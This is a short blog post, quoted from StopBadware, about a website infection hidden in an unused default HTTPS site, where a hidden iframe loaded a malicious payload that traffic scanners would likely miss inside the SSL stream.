Hiding an infection in an unused SSL site

From StopBadware blog:

Today we saw an interesting case where no one could find badware in a website that Google reported as infected—until Google tipped us off to check the site using https (i.e., instead of testing http://example.com, we tested https://example.com). Sure enough, when we used https, an apparently unused default site loaded, along with a hidden iframe that connected to a Chinese server and downloaded a malicious payload. In addition to being difficult to track down, my colleague Oliver points out that intrusion detection systems, network firewalls, and other devices that scan traffic as it passes through a network would probably miss this malicious payload because of it being encrypted within an SSL stream.


Leave a Reply